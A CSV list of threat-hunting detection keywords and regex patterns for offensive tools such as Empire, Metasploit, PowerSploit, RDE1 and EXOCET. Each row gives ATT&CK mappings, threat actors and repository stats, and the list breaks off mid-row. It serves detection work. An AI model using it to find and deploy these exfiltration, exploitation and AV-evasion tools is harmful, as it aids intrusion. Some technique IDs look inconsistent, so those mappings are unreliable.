"*ExfilDataToGitHub*",".{0,1000}ExfilDataToGitHub.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1140","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exfil-EC266392-D6BC-4F7B-A4D1-410166D30B55.json*",".{0,1000}Exfil\-EC266392\-D6BC\-4F7B\-A4D1\-410166D30B55\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*exfiltrate_via_post.exe*",".{0,1000}exfiltrate_via_post\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by 
loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*Exfiltration from DNS finished!*",".{0,1000}Exfiltration\sfrom\sDNS\sfinished!.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*Exfiltration from HTTPS finished!*",".{0,1000}Exfiltration\sfrom\sHTTPS\sfinished!.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*Exfiltration.tests.ps1*",".{0,1000}Exfiltration\.tests\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*existing_auto_target.rb*",".{0,1000}existing_auto_target\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exit_nimbo*",".{0,1000}exit_nimbo.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*EXOCET-AV-Evasion-master*",".{0,1000}EXOCET\-AV\-Evasion\-master.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*exocet-shellcode-exec-redo.go*",".{0,1000}exocet\-shellcode\-exec\-redo\.go.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 
- T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*--expected Bad --expected-stop Welcome*",".{0,1000}\-\-expected\sBad\s\-\-expected\-stop\sWelcome.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*expl-bin*",".{0,1000}expl\-bin.{0,1000}","offensive_tool_keyword","expl-bin","some of my modified exploits and some scripts.","T1210.001 - T1201 - T1059","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/sailay1996/expl-bin","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*explib2_ie11_exec_test_case.rb*",".{0,1000}explib2_ie11_exec_test_case\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exploit*wordpress_add_admin*",".{0,1000}exploit.{0,1000}wordpress_add_admin.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*exploit.bash*",".{0,1000}exploit\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.bat*",".{0,1000}exploit\.bat.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.bin*",".{0,1000}exploit\.bin.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.c*",".{0,1000}exploit\.c.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - 
T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.com*",".{0,1000}exploit\.com.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.exe*",".{0,1000}exploit\.exe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.msi*",".{0,1000}exploit\.msi.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.pl*",".{0,1000}exploit\.pl.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.ps1*",".{0,1000}exploit\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.py*",".{0,1000}exploit\.py.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation 
tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.reg*",".{0,1000}exploit\.reg.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.run*",".{0,1000}exploit\.run.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.sh*",".{0,1000}exploit\.sh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.vb*",".{0,1000}exploit\.vb.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.vbe*",".{0,1000}exploit\.vbe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.vbs*",".{0,1000}exploit\.vbs.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation 
tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.vbscript*",".{0,1000}exploit\.vbscript.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.zsh*",".{0,1000}exploit\.zsh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit_frameworks.py*",".{0,1000}exploit_frameworks\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*exploit_fuse.c*",".{0,1000}exploit_fuse\.c.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","363","58","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*exploit_kctf.c*",".{0,1000}exploit_kctf\.c.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","363","58","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*exploit_oneline.md*",".{0,1000}exploit_oneline\.md.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - 
T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" "*exploit_suggester *",".{0,1000}exploit_suggester\s\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*exploit_suggester.*",".{0,1000}exploit_suggester\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*exploit_suggester.py*",".{0,1000}exploit_suggester\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Exploitation Toolkit*",".{0,1000}Exploitation\sToolkit.{0,1000}","offensive_tool_keyword","PRT","PRET is a new tool for printer security testing developed in the scope of a Masters Thesis at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently PostScript. PJL and PCL are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs. accessing the printers file system and memory or even causing physical damage to the device. All attacks are documented in detail in the Hacking Printers Wiki. The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus. after entering a UNIX-like command. PRET translates it to PostScript. PJL or PCL. sends it to the printer. evaluates the result and translates it back to a user-friendly format. 
PRET offers a whole bunch of commands useful for printer attacks and fuzzing","T1210.001 - T1027.002 - T1003 - T1505 - T1564.001","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/RUB-NDS/PRT","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*exploit-database-bin-sploits/*",".{0,1000}exploit\-database\-bin\-sploits\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*Exploit-JBoss -*",".{0,1000}Exploit\-JBoss\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exploit-JBoss.ps1*",".{0,1000}Exploit\-JBoss\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exploit-JBoss.ps1*",".{0,1000}Exploit\-JBoss\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exploit-Jenkins*",".{0,1000}Exploit\-Jenkins.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-Jenkins.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exploit-Jenkins.ps1*",".{0,1000}Exploit\-Jenkins\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exploit-JMXConsole*",".{0,1000}Exploit\-JMXConsole.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 